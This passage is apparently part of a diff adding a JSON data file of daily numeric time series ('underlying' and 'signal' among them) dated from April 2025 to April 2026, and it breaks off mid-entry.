64.21246808743027 + ], + [ + "2025-09-29", + 66.51320688183807 + ], + [ + "2025-09-30", + 67.83641224753137 + ], + [ + "2025-10-01", + 70.07274355087787 + ], + [ + "2025-10-02", + 71.88555909274304 + ], + [ + "2025-10-03", + 67.36702835661829 + ], + [ + "2025-10-06", + 70.87005426879574 + ], + [ + "2025-10-07", + 65.51954978754807 + ], + [ + "2025-10-08", + 70.68180622029047 + ], + [ + "2025-10-09", + 69.4855234823832 + ], + [ + "2025-10-10", + 45.64847638557007 + ], + [ + "2025-10-13", + 55.376547800705254 + ], + [ + "2025-10-14", + 52.154200792507005 + ], + [ + "2025-10-15", + 55.1143119480304 + ], + [ + "2025-10-16", + 53.23984682248552 + ], + [ + "2025-10-17", + 56.0818988690635 + ], + [ + "2025-10-20", + 61.01108455378205 + ], + [ + "2025-10-21", + 60.85647706566996 + ], + [ + "2025-10-22", + 55.29931627333094 + ], + [ + "2025-10-23", + 58.8005753432155 + ], + [ + "2025-10-24", + 62.818022715158584 + ], + [ + "2025-10-27", + 68.40982510515843 + ], + [ + "2025-10-28", + 70.50895449616502 + ], + [ + "2025-10-29", + 71.70377836481467 + ], + [ + "2025-10-30", + 62.41596171288676 + ], + [ + "2025-10-31", + 63.97724808227697 + ], + [ + "2025-11-03", + 65.51481222422643 + ], + [ + "2025-11-04", + 54.7812181327196 + ], + [ + "2025-11-05", + 57.15571257460462 + ], + [ + "2025-11-06", + 49.14873745521012 + ], + [ + "2025-11-07", + 47.946261839436815 + ], + [ + "2025-11-10", + 56.04169259184099 + ], + [ + "2025-11-11", + 54.910031641928526 + ], + [ + "2025-11-12", + 54.559789224805456 + ], + [ + "2025-11-13", + 46.325446328925906 + ], + [ + "2025-11-14", + 46.640053929393474 + ], + [ + "2025-11-17", + 43.533484536467114 + ], + [ + "2025-11-18", + 39.525954257296995 + ], + [ + "2025-11-19", + 42.29672323381893 + ], + [ + "2025-11-20", + 35.34115491699119 + ], + [ + "2025-11-21", + 38.70476984535196 + ], + [ + "2025-11-24", + 48.58340663842029 + ], + [ + "2025-11-25", + 50.698567451472734 + ], + [ + "2025-11-26", + 53.65962103769292 + ], + [ + "2025-11-28", + 56.27734785219506 + ], + [ + "2025-12-01", + 54.882831472797236 + ], + [ + "2025-12-02", + 57.515448064622284 + ], + [ + "2025-12-03", + 58.33933408567453 + ], + [ + "2025-12-04", + 57.8781407991309 + ], + [ + "2025-12-05", + 59.39219450075155 + ], + [ + "2025-12-08", + 58.32551371522414 + ], + [ + "2025-12-09", + 58.83635741146721 + ], + [ + "2025-12-10", + 60.567119249651505 + ], + [ + "2025-12-11", + 58.46787575447652 + ], + [ + "2025-12-12", + 47.927734585066986 + ], + [ + "2025-12-15", + 45.64566944697319 + ], + [ + "2025-12-16", + 46.7189946185241 + ], + [ + "2025-12-17", + 38.955115100694016 + ], + [ + "2025-12-18", + 46.324802335966496 + ], + [ + "2025-12-19", + 52.01813633981649 + ], + [ + "2025-12-22", + 53.976526806748176 + ], + [ + "2025-12-23", + 55.88033438336896 + ], + [ + "2025-12-24", + 57.080317216643415 + ], + [ + "2025-12-26", + 57.04357023738355 + ], + [ + "2025-12-29", + 54.20813648873114 + ], + [ + "2025-12-30", + 52.858899487878396 + ], + [ + "2025-12-31", + 48.25967910933831 + ], + [ + "2026-01-02", + 47.23107368660708 + ], + [ + "2026-01-05", + 51.76237360928317 + ], + [ + "2026-01-06", + 56.27126587521383 + ], + [ + "2026-01-07", + 56.752355767455775 + ], + [ + "2026-01-08", + 53.03488762083391 + ], + [ + "2026-01-09", + 58.171473864625845 + ], + [ + "2026-01-12", + 58.58195124618075 + ], + [ + "2026-01-13", + 57.49524457198889 + ], + [ + "2026-01-14", + 50.27100328265768 + ], + [ + "2026-01-15", + 52.417257444769845 + ], + [ + "2026-01-16", + 51.85525056479397 + ], + [ + "2026-01-20", + 40.10138771997607 + ], + [ + "2026-01-21", + 48.00508984527319 + ], + [ + "2026-01-22", + 51.74249224890575 + ], + [ + "2026-01-23", + 53.323262932415986 + ], + [ + "2026-01-26", + 55.51699508980897 + ], + [ + "2026-01-27", + 59.734260931895506 + ], + [ + "2026-01-28", + 61.194661716074755 + ], + [ + "2026-01-29", + 57.14693350304284 + ], + [ + "2026-01-30", + 50.0371184807912 + ], + [ + "2026-02-02", + 53.55211498065818 + ], + [ + "2026-02-03", + 45.744065442389456 + ], + [ + "2026-02-04", + 38.90503163789485 + ], + [ + "2026-02-05", + 34.418261499508816 + ], + [ + "2026-02-06", + 44.41022362341338 + ], + [ + "2026-02-09", + 47.592275483915145 + ], + [ + "2026-02-10", + 45.866731199107974 + ], + [ + "2026-02-11", + 47.056288042501706 + ], + [ + "2026-02-12", + 39.88025399484124 + ], + [ + "2026-02-13", + 40.87692124281298 + ], + [ + "2026-02-17", + 40.52643527816032 + ], + [ + "2026-02-18", + 44.25394093272112 + ], + [ + "2026-02-19", + 42.762583900148186 + ], + [ + "2026-02-20", + 47.175317776552305 + ], + [ + "2026-02-23", + 42.30763349258588 + ], + [ + "2026-02-24", + 47.409179148360536 + ], + [ + "2026-02-25", + 53.45408584137357 + ], + [ + "2026-02-26", + 48.39511606773926 + ], + [ + "2026-02-27", + 47.13593783313802 + ], + [ + "2026-03-02", + 47.736733148337834 + ], + [ + "2026-03-03", + 43.41308759909918 + ], + [ + "2026-03-04", + 50.24869061529237 + ], + [ + "2026-03-05", + 48.97034682747825 + ], + [ + "2026-03-06", + 43.09312958733668 + ], + [ + "2026-03-09", + 48.871747086157384 + ], + [ + "2026-03-10", + 48.8787420052744 + ], + [ + "2026-03-11", + 48.82132879625314 + ], + [ + "2026-03-12", + 41.90931509211635 + ], + [ + "2026-03-13", + 39.84725220636975 + ], + [ + "2026-03-16", + 45.30015650507183 + ], + [ + "2026-03-17", + 47.55271769179021 + ], + [ + "2026-03-18", + 42.18317924741783 + ], + [ + "2026-03-19", + 41.066793909392686 + ], + [ + "2026-03-20", + 35.215695568596104 + ], + [ + "2026-03-23", + 40.75717740833905 + ], + [ + "2026-03-24", + 38.614316737573645 + ], + [ + "2026-03-25", + 41.76403626569322 + ], + [ + "2026-03-26", + 34.748648158133264 + ], + [ + "2026-03-27", + 30.360437497040138 + ], + [ + "2026-03-30", + 28.855145904621736 + ], + [ + "2026-03-31", + 42.37827740394505 + ], + [ + "2026-04-01", + 46.50901777113315 + ], + [ + "2026-04-02", + 46.894266887268564 + ], + [ + "2026-04-06", + 48.973590659163925 + ], + [ + "2026-04-07", + 49.028559845141224 + ], + [ + "2026-04-08", + 58.40813808788617 + ], + [ + "2026-04-09", + 60.253506701676805 + ], + [ + "2026-04-10", + 60.65699485820025 + ], + [ + "2026-04-13", + 63.52111182147568 + ], + [ + "2026-04-14", + 67.97449809017962 + ], + [ + "2026-04-15", + 70.9705744657146 + ], + [ + "2026-04-16", + 71.95622681191993 + ], + [ + "2026-04-17", + 74.5013067128034 + ], + [ + "2026-04-20", + 72.75337195151894 + ], + [ + "2026-04-21", + 70.62253213823352 + ], + [ + "2026-04-22", + 74.18999686712169 + ], + [ + "2026-04-23", + 71.01117717323785 + ] + ], + "underlying": [ + [ + "2025-04-24", + 25.888994216918945 + ], + [ + "2025-04-25", + 26.743024826049805 + ], + [ + "2025-04-28", + 26.723161697387695 + ], + [ + "2025-04-29", + 27.244516372680664 + ], + [ + "2025-04-30", + 27.249483108520508 + ], + [ + "2025-05-01", + 28.18791961669922 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997262954711914 + ], + [ + "2025-05-06", + 28.17302703857422 + ], + [ + "2025-05-07", + 28.500736236572266 + ], + [ + "2025-05-08", + 29.34979820251465 + ], + [ + "2025-05-09", + 29.280284881591797 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.329978942871094 + ], + [ + "2025-05-14", + 34.93574142456055 + ], + [ + "2025-05-15", + 35.044979095458984 + ], + [ + "2025-05-16", + 35.47695541381836 + ], + [ + "2025-05-19", + 35.57129669189453 + ], + [ + "2025-05-20", + 35.19890213012695 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.907928466796875 + ], + [ + "2025-05-23", + 32.92976379394531 + ], + [ + "2025-05-27", + 35.22373580932617 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.940711975097656 + ], + [ + "2025-05-30", + 34.75699234008789 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.3856086730957 + ], + [ + "2025-06-04", + 36.678558349609375 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.847373962402344 + ], + [ + "2025-06-09", + 37.011234283447266 + ], + [ + "2025-06-10", + 37.726234436035156 + ], + [ + "2025-06-11", + 37.33893585205078 + ], + [ + "2025-06-12", + 37.58224105834961 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685607910156 + ], + [ + "2025-06-17", + 36.52463150024414 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.973487854003906 + ], + [ + "2025-06-23", + 37.09067153930664 + ], + [ + "2025-06-24", + 38.77886962890625 + ], + [ + "2025-06-25", + 39.076629638671875 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.540504455566406 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276611328125 + ], + [ + "2025-07-02", + 41.07826232910156 + ], + [ + "2025-07-03", + 42.228450775146484 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.3421516418457 + ], + [ + "2025-07-09", + 42.198577880859375 + ], + [ + "2025-07-10", + 42.00438690185547 + ], + [ + "2025-07-11", + 41.68571853637695 + ], + [ + "2025-07-14", + 42.128868103027344 + ], + [ + "2025-07-15", + 42.238407135009766 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.34379196166992 + ], + [ + "2025-07-18", + 43.19441223144531 + ], + [ + "2025-07-21", + 43.851661682128906 + ], + [ + "2025-07-22", + 43.16951370239258 + ], + [ + "2025-07-23", + 43.73714065551758 + ], + [ + "2025-07-24", + 44.025936126708984 + ], + [ + "2025-07-25", + 44.2748908996582 + ], + [ + "2025-07-28", + 44.70808410644531 + ], + [ + "2025-07-29", + 44.50393295288086 + ], + [ + "2025-07-30", + 44.658294677734375 + ], + [ + "2025-07-31", + 43.9213752746582 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.547935485839844 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23506164550781 + ], + [ + "2025-08-07", + 44.68318557739258 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.23252487182617 + ], + [ + "2025-08-14", + 47.10307312011719 + ], + [ + "2025-08-15", + 46.43585968017578 + ], + [ + "2025-08-18", + 46.3761100769043 + ], + [ + "2025-08-19", + 44.4840202331543 + ], + [ + "2025-08-20", + 43.67241287231445 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.001853942871094 + ], + [ + "2025-08-25", + 44.60850143432617 + ], + [ + "2025-08-26", + 45.12633514404297 + ], + [ + "2025-08-27", + 45.330482482910156 + ], + [ + "2025-08-28", + 46.15702438354492 + ], + [ + "2025-08-29", + 44.493980407714844 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.36949920654297 + ], + [ + "2025-09-04", + 45.569480895996094 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.37112808227539 + ], + [ + "2025-09-09", + 46.749549865722656 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.58605194091797 + ], + [ + "2025-09-12", + 48.1785774230957 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399444580078 + ], + [ + "2025-09-17", + 48.960304260253906 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.14200210571289 + ], + [ + "2025-09-23", + 51.09139633178711 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.26162338256836 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.181880950927734 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.48590087890625 + ], + [ + "2025-10-08", + 54.26517105102539 + ], + [ + "2025-10-09", + 54.05086135864258 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.402610778808594 + ], + [ + "2025-10-15", + 51.43429183959961 + ], + [ + "2025-10-16", + 50.86113739013672 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.711952209472656 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.10247039794922 + ], + [ + "2025-10-27", + 58.028045654296875 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.36164093017578 + ], + [ + "2025-11-05", + 56.438167572021484 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.86113739013672 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30083084106445 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596603393555 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.1986083984375 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87641906738281 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.33173370361328 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080001831055 + ], + [ + "2025-12-09", + 55.83012390136719 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037536621094 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + "2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.83333969116211 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2025-04-24", + 465.0987243652344 + ], + [ + "2025-04-25", + 470.28363037109375 + ], + [ + "2025-04-28", + 470.1343688964844 + ], + [ + "2025-04-29", + 473.23931884765625 + ], + [ + "2025-04-30", + 473.1795959472656 + ], + [ + "2025-05-01", + 479.35968017578125 + ], + [ + "2025-05-02", + 486.4752197265625 + ], + [ + "2025-05-05", + 483.5892333984375 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.97186279296875 + ], + [ + "2025-05-08", + 485.9378662109375 + ], + [ + "2025-05-09", + 485.6194152832031 + ], + [ + "2025-05-12", + 505.40362548828125 + ], + [ + "2025-05-13", + 513.1063842773438 + ], + [ + "2025-05-14", + 516.1814575195312 + ], + [ + "2025-05-15", + 516.7487182617188 + ], + [ + "2025-05-16", + 518.997802734375 + ], + [ + "2025-05-19", + 519.4954223632812 + ], + [ + "2025-05-20", + 517.7637939453125 + ], + [ + "2025-05-21", + 510.5686340332031 + ], + [ + "2025-05-22", + 511.5240173339844 + ], + [ + "2025-05-23", + 506.78692626953125 + ], + [ + "2025-05-27", + 518.7091674804688 + ], + [ + "2025-05-28", + 516.4102783203125 + ], + [ + "2025-05-29", + 517.4254150390625 + ], + [ + "2025-05-30", + 516.609375 + ], + [ + "2025-06-02", + 520.689697265625 + ], + [ + "2025-06-03", + 524.7598876953125 + ], + [ + "2025-06-04", + 526.2228393554688 + ], + [ + "2025-06-05", + 522.261962890625 + ], + [ + "2025-06-06", + 527.3672485351562 + ], + [ + "2025-06-09", + 528.1436157226562 + ], + [ + "2025-06-10", + 531.6366577148438 + ], + [ + "2025-06-11", + 529.8452758789062 + ], + [ + "2025-06-12", + 531.0892944335938 + ], + [ + "2025-06-13", + 524.4215698242188 + ], + [ + "2025-06-16", + 531.7162475585938 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4417724609375 + ], + [ + "2025-06-20", + 524.292236328125 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.783203125 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.1992797851562 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622924804688 + ], + [ + "2025-07-07", + 549.9878540039062 + ], + [ + "2025-07-08", + 550.2966918945312 + ], + [ + "2025-07-09", + 554.1921997070312 + ], + [ + "2025-07-10", + 553.3952026367188 + ], + [ + "2025-07-11", + 552.1497802734375 + ], + [ + "2025-07-14", + 554.1524047851562 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.2283325195312 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7242431640625 + ], + [ + "2025-07-24", + 562.9197387695312 + ], + [ + "2025-07-25", + 564.2747192382812 + ], + [ + "2025-07-28", + 566.0382690429688 + ], + [ + "2025-07-29", + 565.1614990234375 + ], + [ + "2025-07-30", + 565.9186401367188 + ], + [ + "2025-07-31", + 562.9197387695312 + ], + [ + "2025-08-01", + 551.8309936523438 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.1973266601562 + ], + [ + "2025-08-06", + 565.2212524414062 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244995117188 + ], + [ + "2025-08-11", + 570.730712890625 + ], + [ + "2025-08-12", + 577.9041137695312 + ], + [ + "2025-08-13", + 578.193115234375 + ], + [ + "2025-08-14", + 577.7447509765625 + ], + [ + "2025-08-15", + 575.2042236328125 + ], + [ + "2025-08-18", + 574.9750366210938 + ], + [ + "2025-08-19", + 567.1740112304688 + ], + [ + "2025-08-20", + 563.8065185546875 + ], + [ + "2025-08-21", + 561.1962280273438 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.210205078125 + ], + [ + "2025-08-26", + 570.4915771484375 + ], + [ + "2025-08-27", + 571.368408203125 + ], + [ + "2025-08-28", + 574.9451293945312 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.527587890625 + ], + [ + "2025-09-03", + 567.9610595703125 + ], + [ + "2025-09-04", + 573.1019287109375 + ], + [ + "2025-09-05", + 573.9288940429688 + ], + [ + "2025-09-08", + 576.728515625 + ], + [ + "2025-09-09", + 578.3624267578125 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.9192504882812 + ], + [ + "2025-09-12", + 584.4896850585938 + ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.992919921875 + ], + [ + "2025-09-17", + 587.8173217773438 + ], + [ + "2025-09-18", + 593.11767578125 + ], + [ + "2025-09-19", + 597.1326904296875 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.8842163085938 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4784545898438 + ], + [ + "2025-10-15", + 600.6876831054688 + ], + [ + "2025-10-16", + 598.46337890625 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.9839477539062 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4694213867188 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.67431640625 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.7926635742188 + ], + [ + "2025-11-19", + 598.3436279296875 + ], + [ + "2025-11-20", + 584.1797485351562 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3407592773438 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.67431640625 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4172973632812 + ], + [ + "2025-12-03", + 621.9334716796875 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915283203125 + ], + [ + "2025-12-09", + 623.4595336914062 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0586547851562 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601196289062 + ], + [ + "2025-12-19", + 615.47998046875 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 